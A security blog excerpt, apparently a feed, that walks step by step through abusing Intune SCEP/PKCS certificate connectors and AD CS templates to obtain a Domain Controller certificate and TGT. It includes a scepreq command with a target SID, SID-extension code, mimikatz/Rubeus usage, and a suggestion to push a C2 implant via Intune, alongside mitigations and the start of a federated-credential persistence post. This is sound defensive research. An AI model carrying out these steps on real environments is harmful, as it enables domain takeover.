    Template Last Modified              : 2025-05-22T14:10:00+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HYBRID.IMINYOUR.CLOUD\svc_ndes
                                          HYBRID.IMINYOUR.CLOUD\Domain Admins
                                          HYBRID.IMINYOUR.CLOUD\Enterprise Admins
</code></pre></div></div>

<p>The following details are important for this attack:</p>
<ul>
  <li>The template is from a CA that is in the <code class="language-plaintext highlighter-rouge">NTAuthCertificates</code> object in AD.</li>
  <li>The <code class="language-plaintext highlighter-rouge">EnrolleeSuppliesSubject</code> flag is set. This is a requirement for Intune to be able to issue certificates for other users/devices, meaning that this flag should always be set for Intune templates.</li>
  <li>The certificate allows for client authentication. As client authentication is one of the major use cases for these certs, I can’t imagine many cases in which this will not be configured.</li>
  <li>A service account hosting the NDES server role or the host on which the certificate connector is running is authorized to enroll in the cert template. For SCEP it is common to use a separate service account, for PKCS I think it defaults to the computer account of the server. If “Domain Users” can enroll then you already have ESC1 and there isn’t much need for the rest of this blog as long as you have network connectivity to the CA.</li>
</ul>
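<p>To triage such templates quickly, the conditions above can be checked programmatically. Below is a rough, hypothetical helper (not part of Certipy) that parses a Certipy-style text dump like the one above and flags the dangerous combination; the field names match Certipy’s output.</p>

```python
# Hypothetical triage helper: flag AD CS templates (from a Certipy-style
# text dump) that combine EnrolleeSuppliesSubject with client authentication
# and no manager approval, the combination abused in this blog.

def parse_template(dump: str) -> dict:
    """Parse 'Key : Value' lines from a Certipy-style template dump."""
    fields = {}
    for line in dump.splitlines():
        if ":" in line:
            key, _, value = line.partition(":")
            key, value = key.strip(), value.strip()
            if key and value:
                fields[key] = value
    return fields

def is_abusable(fields: dict) -> bool:
    """True when user-supplied subjects are allowed on a client-auth template."""
    return (
        fields.get("Enrollee Supplies Subject") == "True"
        and fields.get("Client Authentication") == "True"
        and fields.get("Requires Manager Approval") != "True"
    )
```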

<h2 id="scep-vs-pkcs">SCEP vs PKCS</h2>
<p>While the Intune Certificate connector supports both protocols, companies are likely to use either one or the other. Architecture-wise, they are quite different, so let’s take a high-level look at how both operate:</p>

<h3 id="pkcs">PKCS</h3>
<p>PKCS performs most of the operations between Intune and the device. The flow is as follows:</p>

<ul>
  <li>Intune generates a Certificate Signing Request (CSR) and private key within the Intune service.</li>
  <li>When the Certificate Connector checks in, it downloads the CSR and requests the certificate from AD CS.</li>
  <li>It then uploads the issued certificate to Intune.</li>
  <li>The issued certificate with the Intune generated private key is pushed to the device.</li>
</ul>

<p>In a diagram, that looks as follows:</p>

<p><img src="/assets/img/intune/01-intune-pkcs.png" alt="Intune PKCS flow diagram" class="align-center" /></p>

<p>The important details here are:</p>
<ul>
  <li>The private key is generated by Intune, not by the device. Theoretically Intune also possesses the private key while it hasn’t yet been provisioned to the end-user device.</li>
  <li>The device only communicates with Intune, not with any AD asset directly.</li>
  <li>It can be used to enroll in any template that the connector service has access to, since this is supplied in the certificate configuration.</li>
</ul>

<h3 id="scep">SCEP</h3>
<p>With SCEP, the flow is different:</p>

<ul>
  <li>Intune generates an encrypted and signed “challenge blob” and sends this with the certificate details to the device.</li>
  <li>The device generates a private key locally and uses SCEP to talk to the NDES server, requesting a certificate based on a CSR and the challenge.</li>
  <li>The certificate connector validates the challenge and CSR by sending them to Intune. Intune performs various checks to confirm that the subject, SANs, EKUs, etc. match the certificate profile, and that the challenge isn’t expired.</li>
  <li>If the validation succeeds, the certificate connector sends the CSR to the CA, which issues the certificate.</li>
  <li>The signed certificate is returned in the SCEP response to the device.</li>
</ul>

<p>Again a diagram of this flow:</p>

<p><img src="/assets/img/intune/02-intune-scep.png" alt="Intune SCEP flow diagram" class="align-center" /></p>

<p>A few notable points:</p>

<ul>
  <li>In this case the private key never leaves the end device.</li>
  <li>The device does communicate with AD, usually over something like an application proxy.</li>
  <li>The device generates the CSR, so it could request a completely different cert; however, the NDES server validates the request by sending the CSR to Intune.</li>
  <li>The enrollment template is fixed because it is configured in the registry on the NDES server.</li>
</ul>

<h2 id="issuing-ad-cs-certificates-with-arbitrary-subjects-as-an-intune-administrator-or-global-administrator">Issuing AD CS certificates with arbitrary subjects as an Intune Administrator or Global Administrator</h2>
<p>It should be no surprise that if such a setup is present, it can be abused by attackers that have a privileged role in the tenant. After all, the AD CS template allows any subject and the Certificate Connector or NDES server can enroll in these templates, so with the correct configuration we can impersonate a Domain Admin or a domain controller. There are three main challenges with this:</p>

<ol>
  <li>Configuring the template so that <a href="https://techcommunity.microsoft.com/blog/intunecustomersuccess/support-tip-implementing-strong-mapping-in-microsoft-intune-certificates/4053376">strong mapping requirements</a> are met and AD will accept the certificate for our user.</li>
  <li>Getting the certificate delivered to an endpoint under the attackers control and using it to request a TGT for further exploitation.</li>
  <li>Having network access to talk to on-prem Domain Controllers. This is out of scope for the blog post; I’m assuming you already have at least network access in AD. While somewhat uncommon, companies may also roll out their VPN configurations via Intune, which usually use the same or a similar device certificate for authentication. As an Intune admin you could also roll out your favorite C2 implant binary to any Intune managed endpoint and get access to the on-prem network that way.</li>
</ol>

<p>Let’s look at the Intune part first. Consider an example certificate profile here:</p>

<p><img src="/assets/img/intune/03-intune-pkcs-profile.png" alt="Intune PKCS configuration profile" class="align-center" /></p>

<p>This is a device certificate, which is why it uses the DNS Subject Alternative Name (SAN) for mapping it to a specific device. User certificates would usually use the UPN instead of the DNS name. The Intune “Certificate type” is a device certificate in this case, which means it will be saved as a computer certificate on the endpoint if the Entra ID device object is in scope of the configuration profile. User certificates, in contrast, are stored in the user certificate store on the endpoint and are issued to users in scope of the configuration profile.</p>

<p>Both user and device certificates can be used to impersonate user or computer accounts in AD, since the mapping is done based on the SAN and the AD CS template will allow both objects. Whether to target a user or device in AD is up to you; in this example the goal will be to impersonate a Domain Controller, so I will pick a computer as a target and use a DNS SAN.</p>

<p>We will create a new configuration profile rather than modifying an existing one, to prevent the change from being rolled out to actual endpoints. This also makes sure the certificate will be provisioned immediately, since I don’t know how fast Intune picks up on “changed” certificate configurations, if at all, once a certificate is already issued.</p>

<p>Based on <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pkca/01c4acb8-c366-4d31-93a5-fbf2d59c8b27">MS-PKCA section 3.1</a>, during PKINIT the certificate will need to be strongly mapped. Luckily for us there is a SAN URL tag specifically for Intune that we can use to ensure this: <code class="language-plaintext highlighter-rouge">URL=tag:microsoft.com,2022-09-14:sid:&lt;value&gt;</code>. In normal configurations this would be dynamically filled in for hybrid joined devices based on the SID that they have in AD, but we can also hard code it in the template. So in our new template, make sure to configure:</p>

<ul>
  <li>The subject (doesn’t really matter in this case).</li>
  <li>The DNS SAN mapping to the hostname of a Domain Controller.</li>
  <li>The URL SAN that includes the SID of the Domain Controller (can be queried with BloodHound, ldapdomaindump or any other LDAP tool).</li>
  <li>Make sure the EKUs include client authentication.</li>
</ul>
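<p>The strong mapping SAN value itself is just a string in a fixed format. As a small sketch, the URL SAN for a given target SID can be built like this (the tag format is the one quoted above from the strong certificate mapping scheme):</p>

```python
import re

# SID format check: 'S-1-' followed by dash-separated numeric subauthorities.
_SID_RE = re.compile(r"^S-1-\d+(-\d+)+$")

def strong_mapping_url(sid: str) -> str:
    """Build the URL SAN value that satisfies strong certificate mapping."""
    if not _SID_RE.match(sid):
        raise ValueError(f"Not a valid SID: {sid}")
    return f"tag:microsoft.com,2022-09-14:sid:{sid}"
```

The resulting string is what goes into the URL SAN field of the configuration profile.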

<p>In my case the final config looks like this:</p>

<p><img src="/assets/img/intune/pkcs-dc.png" alt="Intune PKCS configuration profile" class="align-center" /></p>

<p>Now we need to scope this to a device to actually issue the certificate. There are multiple approaches to this:</p>

<ul>
  <li>Scope it to a legitimate device that is in the same tenant.</li>
  <li>Enroll a Windows based virtual machine in Intune.</li>
  <li>Enroll a fake device with tools such as AADInternals or pytune (I have not tested how easy it is to extract the certs from their output).</li>
  <li>Use roadtune with a fake Intune device which supports both PKCS and SCEP certificates.</li>
</ul>

<p>While roadtune has (or rather, will have from its next release) the most seamless support for this attack, it is currently not available as an open source tool but is part of the Outflank Security Tooling framework. If you have that, great: you can read more about the roadtune specific implementation in the roadtune documentation. But since I don’t want to promote commercial tooling in this blog, I will stick with explaining the other flows here, with the primary focus on real Windows devices or VMs.</p>

<p>In this case I have an already enrolled VM that is in a group that I scope this configuration profile to:</p>

<p><img src="/assets/img/intune/intunescope.png" alt="Intune profile scope" class="align-center" /></p>

<p>It can take a while for the device to pick up the new policy or for Intune to actually start pushing it; assume a delay of around 5-10 minutes (that is what I had in my test). The telemetry in Intune is quite slow, so don’t rely on that. Rather than waiting for the device to sync on its own, it is better to trigger a manual sync until we see the certificate in the store:</p>

<p><img src="/assets/img/intune/manualsync.png" alt="Triggering a manual sync" class="align-center" /></p>

<p><img src="/assets/img/intune/adcs-cert.png" alt="Certificate in the computer certificate store" class="align-center" /></p>

<p><img src="/assets/img/intune/roguecert.png" alt="Certificate SANs mapping to a DC" class="align-center" /></p>

<p>Once the certificate is in the store, we can either export it (bypassing the key export restrictions) using mimikatz, or use it directly with Rubeus by specifying its thumbprint. Note that Rubeus only searches the user store, so if the certificate type was “device” you need to <a href="https://github.com/GhostPack/Rubeus/blob/d7a2506d4760e0618def29a108be10d726b4f260/Rubeus/lib/Ask.cs#L176">patch out</a> the store lookup to target the system cert store instead.</p>

<p><img src="/assets/img/intune/rubeuscertesc.png" alt="Requesting a TGT with Rubeus" /></p>

<p>If we want to capture the certificate before it is stored in the store, we can actually see the PFX cert in the SyncML data as well. There is a super awesome tool to debug this called <a href="https://github.com/okieselbach/SyncMLViewer">SyncMLViewer</a> by Oliver Kieselbach that allows us to capture the SyncML messages via ETW. If we search for the PFX install message, which will contain the “PFXCertInstall” command, we find the PFX itself and its encrypted password:</p>

<p><img src="/assets/img/intune/syncml.png" alt="PFXCertInstall in the SyncML" /></p>

<p>Decrypting the PFX password requires the Intune MDM certificate and private key, which are used to decrypt the PKCS7/CMS encoded data blob containing the PFX password. Performing this is out of the scope of this blog, but it would be an alternative to exporting the key from the Windows certificate store.</p>
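<p>As a rough sketch of the extraction step, the captured SyncML can be walked for <code class="language-plaintext highlighter-rouge">PFXCertInstall</code> items with the standard library. The LocURI paths follow the ClientCertificateInstall CSP; the surrounding XML structure here is a simplified assumption of what SyncMLViewer captures (real SyncML uses XML namespaces, which are omitted for brevity).</p>

```python
# Sketch: pull PFXCertInstall data out of captured SyncML. Namespace
# handling is omitted; node names are assumed from the ClientCertificateInstall
# CSP documentation, so adjust to what your capture actually contains.
import xml.etree.ElementTree as ET

def extract_pfx_items(syncml: str) -> dict:
    """Map PFXCertInstall leaf names (PFXCertBlob, PFXCertPassword, ...) to data."""
    items = {}
    root = ET.fromstring(syncml)
    for item in root.iter("Item"):
        locuri = item.findtext("./Target/LocURI", default="")
        data = item.findtext("./Data")
        if "PFXCertInstall" in locuri and data is not None:
            # The last URI segment names the setting this data belongs to
            items[locuri.rsplit("/", 1)[-1]] = data
    return items
```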

<p>Now that we have a TGT for a Domain Controller we have essentially compromised the on-prem domain.</p>

<p>If you have a SCEP configuration profile instead of a PKCS profile, the same technique can be used to issue the cert to a real device. Alternatively, we can pick the required details out of the SyncML stream and use them with <code class="language-plaintext highlighter-rouge">scepreq</code> as explained further down in the blog.</p>

<h2 id="esc1-over-intune">ESC1 over Intune</h2>
<p>Now that we understand the general setup, let’s look at how we can achieve this without modifying configuration profiles, for example from the position of a low-privileged user with an Intune license. Consider for example the following template:</p>

<p><img src="/assets/img/intune/weak-scep.png" alt="Intune certificate profile with a device-based SAN" /></p>

<p>This profile puts the FQDN of our device as a SAN in the certificate. There are many variables that could be used here, as reflected in the <a href="https://learn.microsoft.com/en-us/intune/intune-service/protect/certificates-pfx-configure#subject-name-format">Microsoft documentation</a>. What is important here is that some of these come from essentially untrusted, user controlled data. This will mostly be the case for “device” type certificates, since “user” certificates are usually based on Entra data such as a UPN, which can’t be modified by the users themselves.</p>

<p><em>There could be a corner case if the company is syncing Tier 0 AD users to Entra ID, which is against best practices. If you could compromise such an account it could also be used to request certificates. But that would be a corner case that likely requires similar privileges in the tenant as the scenario above.</em></p>

<p>Back to the device cert based scenario. Microsoft does call out in the <a href="https://learn.microsoft.com/en-us/intune/intune-service/protect/certificates-pfx-configure#subject-name-format">documentation</a> that these parameters can be spoofed.</p>

<p><img src="/assets/img/intune/spoofwarning.png" alt="Warning against using these variables in the Microsoft documentation" /></p>

<p>So this is exactly what we will be doing in this case. Before strong mapping was required, this would have been quite easy since we only need to include the correct DNS or UPN SAN in our request. Now that <a href="https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16">strong mapping</a> is the default, that leaves us with two options:</p>

<ol>
  <li>If strong mapping is not enforced, aka the <a href="https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16#bkmk_kdcregkey">registry setting</a> <code class="language-plaintext highlighter-rouge">StrongCertificateBindingEnforcement</code> is set to 1, then we can use both PKCS and SCEP templates to request a certificate with a UPN or DNS name SAN that is attacker controlled.</li>
  <li>If strong mapping is enforced, which is the default currently and will be the only supported mode from September 2025, then we can only use SCEP templates to perform this elevation of privileges.</li>
</ol>

<p>Why SCEP? Because with PKCS, the entire flow is between Intune and the Certificate Connector, which means we cannot add the strong mapping. The KDC will not accept our certificate and will throw an error if no strong mapping is present. With SCEP we can create our own CSR, and as long as the subject and SANs match the values in the Intune configuration profile, it turns out we can add the SID security extension to the certificate with an arbitrary SID, and this will pass the validation.</p>
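<p>For illustration, the SID security extension (<code class="language-plaintext highlighter-rouge">szOID_NTDS_CA_SECURITY_EXT</code>, OID <code class="language-plaintext highlighter-rouge">1.3.6.1.4.1.311.25.2</code>) can be sketched with hand-rolled DER. Tools like Certipy and scepreq build this with proper ASN.1 libraries; this minimal version only shows the layout, which I understand to be a SEQUENCE holding one otherName that wraps the SID string as an OCTET STRING.</p>

```python
# Hand-rolled DER sketch of the SID security extension value. Layout and
# OIDs are my reading of the szOID_NTDS_CA_SECURITY_EXT structure as built
# by tools like Certipy; treat this as illustrative, not authoritative.

def _der(tag: int, content: bytes) -> bytes:
    """Encode tag + definite length + content (handles lengths < 0x10000)."""
    if len(content) < 0x80:
        length = bytes([len(content)])
    elif len(content) < 0x100:
        length = bytes([0x81, len(content)])
    else:
        length = bytes([0x82, len(content) >> 8, len(content) & 0xFF])
    return bytes([tag]) + length + content

# Pre-encoded OID 1.3.6.1.4.1.311.25.2.1 (szOID_NTDS_OBJECTSID)
_OID_NTDS_OBJECTSID = bytes.fromhex("060a2b060104018237190201")

def sid_security_extension(sid: str) -> bytes:
    """DER value of the extension: SEQUENCE of one otherName GeneralName
    wrapping the SID string as an OCTET STRING."""
    octet = _der(0x04, sid.encode("ascii"))               # OCTET STRING sid
    value = _der(0xA0, octet)                             # [0] EXPLICIT value
    other_name = _der(0xA0, _OID_NTDS_OBJECTSID + value)  # [0] otherName
    return _der(0x30, other_name)                         # SEQUENCE
```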

<p>To sum up the requirements:</p>

<ul>
  <li>We need to have a SCEP certificate that is configured for client auth and allows the Digital Signature key usage (this will be the case in most deployments).</li>
  <li>The certificate should have a SAN mapping that uses user-controlled or modifiable data. Examples are given below. This is what makes the configuration actually vulnerable and what should be mitigated if you are using such a configuration in production.</li>
  <li>We need to have a device that is in scope of this configuration profile.</li>
</ul>

<p>There are a few challenges here:</p>
<ul>
  <li>Intune does not by default allow regular users to view the configuration profiles. If we want to determine the actual configuration, we would need a role like Global Reader assigned. An alternative, if one has access to a legitimate device, is to look at the certificates installed on the device. If the SAN is constructed from something that is user controllable, such as the device name or serial number, it can be abused.</li>
  <li>If we do this with a device that is in scope of the real policy, we can modify the configuration on-device. Doing that, however, requires figuring out where the device gets these values from and then replacing them on disk, in memory or in the registry. For a fake device this is easier, since we can just change the device parameters in the enrollment profile data.</li>
</ul>

<p>Some abusable configurations in SANs are:</p>
<ul>
  <li>Having a DNS SAN with <code class="language-plaintext highlighter-rouge">{{DeviceName}}</code>. The device name can be configured as an FQDN, though Windows will not allow you to do so in the UI. Intune accepts these names without issue.</li>
  <li>Having a DNS SAN with <code class="language-plaintext highlighter-rouge">{{DeviceName}}.companydomain.com</code>. In this case we only need to spoof the first part, which we can do by renaming the real device.</li>
  <li>Having a configuration as above, but then with <code class="language-plaintext highlighter-rouge">{{IMEI}}</code> or <code class="language-plaintext highlighter-rouge">{{SerialNumber}}</code>. I don’t know where real Windows devices source this information from, so you’d have to figure that out yourself, or enroll a fake device.</li>
</ul>

<p>Examples of configurations that are not vulnerable:</p>
<ul>
  <li>Having a DNS SAN with <code class="language-plaintext highlighter-rouge">{{DeviceName}}.companydomain.com</code>, if the domain does <strong>not match</strong> the on-premises domain name.</li>
  <li>Using a SAN with data sourced from Entra / Intune that is automatically generated, such as <code class="language-plaintext highlighter-rouge">AAD_Device_ID</code> or <code class="language-plaintext highlighter-rouge">DeviceId</code>.</li>
</ul>

<p>I have not yet figured out where <code class="language-plaintext highlighter-rouge">{{FullyQualifiedDomainName}}</code> is sourced from; it may be that this variable only exists on hybrid joined devices.</p>
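<p>Summarizing the above: whether a SAN format is abusable comes down to whether it embeds device-controlled variables. A rough, hypothetical triage helper could look like this; the variable list follows the abusable examples above, with names from the Microsoft subject-name-format documentation.</p>

```python
# Hypothetical triage: flag device-controlled {{variables}} in an Intune
# SAN format string. The DEVICE_CONTROLLED set mirrors the abusable
# examples discussed in this blog; extend it for your own environment.
import re

DEVICE_CONTROLLED = {"DeviceName", "IMEI", "SerialNumber"}

def spoofable_variables(san_format: str) -> set:
    """Return the device-controlled {{variables}} present in a SAN format."""
    return {v for v in re.findall(r"\{\{(\w+)\}\}", san_format)
            if v in DEVICE_CONTROLLED}
```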

<p>In this walkthrough we will explore the simplest configuration, where there is a SCEP cert that has a SAN based on the device name and a domain suffix that matches the on-prem AD domain.</p>

<p><img src="/assets/img/intune/scep-vuln-example.png" alt="Vulnerable SCEP template" /></p>

<p>Let’s rename our device to match a Domain Controller name:</p>

<p><img src="/assets/img/intune/rename-pc.png" alt="Renaming the device to match a Domain Controller" class="align-center" /></p>

<p>We also run the <a href="https://github.com/okieselbach/SyncMLViewer">SyncMLViewer</a> tool to capture and inspect the SyncML traffic. What we are looking for are SyncML nodes with the <code class="language-plaintext highlighter-rouge">ClientCertificateInstall/SCEP</code> URI; these will contain the data for our SCEP enrollment. Once we trigger the sync with the new name we should see the data.</p>

<p><img src="/assets/img/intune/syncml-scep.png" alt="SCEP enrollment data" /></p>

<p>This contains everything we need to use <a href="https://github.com/dirkjanm/scepreq">scepreq</a> to talk to the NDES service. Scepreq is a new tool that I’m releasing with this blog. It is essentially a modified fork of <a href="https://github.com/bikram990/PyScep">PyScep</a> with a command line wrapper and extensions for AD CS and Intune specific certificate requests. The structures for custom SANs and security extensions are borrowed from <a href="https://github.com/ly4k/Certipy">Certipy</a>.</p>

<p>We will need:</p>

<ul>
  <li>The <code class="language-plaintext highlighter-rouge">ServerURL</code>, which contains the SCEP endpoint.</li>
  <li>The <code class="language-plaintext highlighter-rouge">Challenge</code>, which is used in SCEP as a password. The challenge is valid for an hour after it is issued.</li>
  <li>The <code class="language-plaintext highlighter-rouge">EKUMapping</code>, which should at least contain client authentication (<code class="language-plaintext highlighter-rouge">1.3.6.1.5.5.7.3.2</code>), or the “any purpose” EKU.</li>
  <li>The <a href="https://learn.microsoft.com/en-us/windows/client-management/mdm/clientcertificateinstall-csp#devicescepuniqueidinstallkeyusage">key usage</a>. The values are from <code class="language-plaintext highlighter-rouge">X509KeyUsageFlags</code> <a href="https://learn.microsoft.com/en-us/windows/win32/api/certenroll/ne-certenroll-x509keyusageflags">defined in certenroll.h</a>. Most of the time it will be 160 in decimal which means both “digital signature” and “key encipherment”.</li>
  <li>The <code class="language-plaintext highlighter-rouge">SubjectName</code> for the cert.</li>
  <li>The <code class="language-plaintext highlighter-rouge">SubjectAlternativeNames</code> to use. These have a bit of a <a href="https://learn.microsoft.com/en-us/windows/client-management/mdm/clientcertificateinstall-csp#devicescepuniqueidinstallsubjectalternativenames">weird format</a>, with the comment in the documentation “Refer name type definition in MSDN”. The format is as follows: <code class="language-plaintext highlighter-rouge">[nameformat1]+[actual name1];[name format 2]+[actual name2]</code>, where the nameformat is a number. I did manage to find the documentation for these numbers; they <a href="https://learn.microsoft.com/en-us/windows/win32/api/certenroll/ne-certenroll-alternativenametype">map to constants</a> from the <code class="language-plaintext highlighter-rouge">AlternativeNameType</code> enum in <code class="language-plaintext highlighter-rouge">certenroll.h</code>.</li>
  <li>The SID from our victim, the Domain Controller, queried as in the first scenario in this blog.</li>
</ul>
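<p>Two of these values deserve a quick decode. The sketch below parses the SAN string format and the key usage integer; the name-type numbers and key usage bits follow my reading of the <code class="language-plaintext highlighter-rouge">certenroll.h</code> enums referenced above, and only the values relevant here are mapped.</p>

```python
# Decode the ClientCertificateInstall SAN string and key usage integer.
# Name-type numbers are from certenroll.h's AlternativeNameType enum and
# key usage bits from X509KeyUsageFlags (only relevant values mapped here).

ALT_NAME_TYPES = {
    2: "rfc822",   # XCN_CERT_ALT_NAME_RFC822_NAME (email)
    3: "dns",      # XCN_CERT_ALT_NAME_DNS_NAME
    7: "url",      # XCN_CERT_ALT_NAME_URL
    11: "upn",     # XCN_CERT_ALT_NAME_USER_PRINCIPLE_NAME
}

def parse_sans(san_string: str) -> list:
    """Parse '[fmt1]+[name1];[fmt2]+[name2]' into (type, value) tuples."""
    sans = []
    for part in san_string.split(";"):
        fmt, _, name = part.partition("+")
        sans.append((ALT_NAME_TYPES.get(int(fmt), f"type{fmt}"), name))
    return sans

def parse_key_usage(value: int) -> list:
    """Decode X509KeyUsageFlags bits, e.g. 160 = 0x80 | 0x20."""
    flags = {0x80: "digitalSignature", 0x40: "nonRepudiation",
             0x20: "keyEncipherment", 0x10: "dataEncipherment"}
    return [name for bit, name in flags.items() if value & bit]
```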

<p>If we take all that we can pass it to <code class="language-plaintext highlighter-rouge">scepreq</code>. Note that most of these values are actually case sensitive!</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>scepreq -u https://s25-ndes.hybrid.iminyour.cloud/certsrv/mscep/mscep.dll -p &lt;challenge&gt; --dns HYBRID-DC.hybrid.iminyour.cloud -s 'CN=c711a89b-7b82-4d84-bfa2-040d03057ee5' --sid S-1-5-21-1414223725-1888795230-1473887622-1000
</code></pre></div></div>

<p>If all succeeds we get a certificate. If not, there is unfortunately zero error information that NDES will give us as to why it failed. The reason will be logged in the event logs on the NDES server, but that is not a source of information we have access to in this scenario. Anyway, if all goes well it should look like this:</p>

<p><img src="/assets/img/intune/scepreq.png" alt="SCEP enrollment success" /></p>

<p>Once we have the certificate we can request a TGT with <a href="https://github.com/dirkjanm/PKINITtools">PKINITtools</a>, Certipy or Rubeus:</p>

<p><img src="/assets/img/intune/gettgtpkinit.png" alt="Requesting a TGT with PKINITtools" /></p>

<p>And once again we have a TGT for a Domain Controller, elevating our privileges to Domain Admin.</p>

<h2 id="challenges-and-mitigations">Challenges and mitigations</h2>
<p>In this case the starting point was a Windows device on which we had Administrator access, so that we could spoof the correct variables and abuse the template. In a less straightforward configuration than the example above, it would be more complex to spoof the correct identifier (such as a serial number) on a real device. Getting a fake device enrolled with either a tool or as a VM would work, but then usually corporate device enrollment limitations would apply, often enforced through Autopilot. There is some discussion about whether Autopilot and the registration of hardware IDs is actually a security feature or more of an accidental security barrier for attackers. I see it as a feature that will often stop attackers from enrolling fake devices, though I don’t think it is intended this way.</p>

<p>In any case, the important message here is that Intune administrators should avoid using spoofable identifiers in certificate profiles. And of course be aware that when someone obtains Intune Administrator or Global Administrator and also has access to the AD network, it is pretty much game over.</p>

<p>As far as detection goes, the usual AD CS certificate abuse detection advice would apply, and hopefully some security product or custom detection rule will alert on certificates being issued for Domain Admins or Domain Controllers, or TGTs requested for them with a certificate if this is not normally something they do.</p>

<h2 id="tools">Tools</h2>
<p>The scepreq tool is available on <a href="https://github.com/dirkjanm/scepreq">GitHub</a>. If you want to do this with roadtune, expect a new release soon which includes PKCS extraction capabilities and automatic SCEP enrollment based on configurations that are pushed from Intune.</p>

<p>Lastly a shout-out to Rudy Ooms, whose <a href="https://call4cloud.nl">documentation on all the Intune things</a> was extremely valuable while developing the Intune related protocols.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[Active Directory Certificate Services (AD CS) attack surface is pretty well explored in Active Directory itself, with *checks notes* already 16 “ESC” attacks being publicly described. Hybrid certificate attack paths have not gained that much attention yet, though I have come across several hybrid integrations while reviewing cloud configurations. In these setups, certificates are rolled out to cloud-managed endpoints via Microsoft Intune and the Intune certificate connector. The certificate connector runs in on-premises AD and requests the certificates on AD CS via the SCEP or PKCS integrations. In such environments, it would be possible to request certificates with arbitrary subjects as an Intune administrator. What I have also observed in some cases are certificate configurations in Intune being misconfigured in a way that would allow regular users to perform the same attack and effectively perform ESC1 over Intune certificates. That means going from regular user and their endpoint to Domain Admin in AD, all from the cloud. 
This blog explores the scenarios where this is possible and provides exploitation and remediation guidance.]]></summary></entry><entry><title type="html">Persisting on Entra ID applications and User Managed Identities with Federated Credentials</title><link href="https://dirkjanm.io/persisting-with-federated-credentials-entra-apps-managed-identities/" rel="alternate" type="text/html" title="Persisting on Entra ID applications and User Managed Identities with Federated Credentials" /><published>2024-07-31T18:00:57+00:00</published><updated>2024-07-31T18:00:57+00:00</updated><id>https://dirkjanm.io/persisting-with-federated-credentials-entra-apps-managed-identities</id><content type="html" xml:base="https://dirkjanm.io/persisting-with-federated-credentials-entra-apps-managed-identities/"><![CDATA[<p>Using applications and service principals for persistence and privilege escalation is a well-known topic in Entra ID (Azure AD). I’ve <a href="/azure-ad-privilege-escalation-application-admin/">written about</a> these kind of attacks many years ago, and talked about how we can use certificates and application passwords to authenticate as applications and abuse the permissions they have. In this blog, we cover a third way of authenticating as an application: using federated credentials. Federated credentials have been around for a few years, but haven’t been covered much yet from the offensive side. For Entra ID applications, there is no large difference between configuring federated credentials or regular client secrets/certificates. The more interesting part on this topic is that we can also configure federated credentials on User Managed Identities in Azure. This is unusual, because normally Managed Identities have their authentication controlled by Microsoft, and their authentication is tied to a certain resource such as a Virtual Machine. 
With federated credentials, we can bypass that limitation, given that we have sufficient privileges, and authenticate as this managed identity without requiring access to another resource in Azure. With this blog I’m also introducing a new utility to the ROADtools family: roadoidc, which can set up a minimal Identity Provider (IdP), allowing us to authenticate using federated credentials as apps and user managed identities with roadtx.</p>

<h1 id="federated-credentials-concept">Federated credentials concept</h1>
<p>The idea behind federated credentials is that you can choose to trust another Identity Provider (IdP) to authenticate your apps. This solves, for example, manual credential management for workloads that run outside of Azure, where Managed Identities are unavailable. An example of this is that you can use federated credentials in GitHub Actions. This allows a specific pipeline, or pipelines from the same repository, to access a workload identity without needing certificates or passwords configured in the pipeline definition. The concept of federated identities in Entra and Azure is documented <a href="https://learn.microsoft.com/en-us/entra/workload-id/workload-identity-federation">here</a>.</p>
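<p>For context, configuring such a credential on an app registration boils down to a small JSON object. The sketch below builds the request body for Microsoft Graph’s <code class="language-plaintext highlighter-rouge">federatedIdentityCredentials</code> endpoint; the field names follow my understanding of Graph’s federatedIdentityCredential resource and the audience shown is the common default, but verify both against the current Graph documentation. All values in the example are illustrative.</p>

```python
# Sketch: request body for POST /applications/{id}/federatedIdentityCredentials
# (Microsoft Graph). Field names per the federatedIdentityCredential resource;
# the issuer/subject values you supply must match the tokens your IdP issues.
import json

def federated_credential_payload(name: str, issuer: str, subject: str) -> str:
    return json.dumps({
        "name": name,          # display name of the credential
        "issuer": issuer,      # the external IdP's issuer URL
        "subject": subject,    # 'sub' claim Entra expects in the ID token
        "audiences": ["api://AzureADTokenExchange"],  # common default audience
    })
```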

<p>On a protocol level, federated credentials use OpenID Connect (OIDC) as a way of establishing a trust between Entra and another IdP. The protocol is <a href="https://openid.net/specs/openid-connect-core-1_0.html">standardized</a> and is commonly used to let applications trust Entra ID as an IdP, but in this case we use it as a way for Entra ID to trust a third-party IdP. Once the IdP is configured as a trusted token issuer, Entra will query the <code class="language-plaintext highlighter-rouge">.well-known/openid-configuration</code> endpoint <a href="https://openid.net/specs/openid-connect-discovery-1_0.html">as specified in the OpenID Connect discovery protocol</a>. This configuration document also points us to the trusted keys with which ID tokens must be signed.</p>
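<p>To make this concrete: the discovery document only needs a handful of fields for this trust to work. The sketch below builds the minimal shape in Python (the <code class="language-plaintext highlighter-rouge">jwks_uri</code> path is an arbitrary choice, not mandated by the spec; the issuer URL is the example host used throughout this post):</p>

```python
import json

# Minimal OpenID Provider Configuration document; the issuer URL is the
# example host used in this post, the jwks_uri path is an arbitrary choice.
issuer = "https://roadoidcapp.azurewebsites.net"
discovery = {
    "issuer": issuer,
    "jwks_uri": f"{issuer}/.well-known/jwks.json",  # where Entra fetches our signing keys
    "response_types_supported": ["id_token"],
    "subject_types_supported": ["public"],
    "id_token_signing_alg_values_supported": ["RS256"],
}
print(json.dumps(discovery, indent=2))
```

<p>Entra fetches this document from <code class="language-plaintext highlighter-rouge">.well-known/openid-configuration</code> on the issuer host and follows <code class="language-plaintext highlighter-rouge">jwks_uri</code> to obtain the trusted keys.</p>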

<h1 id="creating-our-own-minimal-idp">Creating our own minimal IdP</h1>
<p>The idea behind using federated credentials is that we trust a well-known platform such as GitHub, AWS or GCP. But we can also roll our own IdP with our own keys, as long as we can host them somewhere Entra ID can reach them. At a minimum, we need two files:</p>

<ul>
  <li>The OpenID Provider Configuration file at <code class="language-plaintext highlighter-rouge">.well-known/openid-configuration</code>.</li>
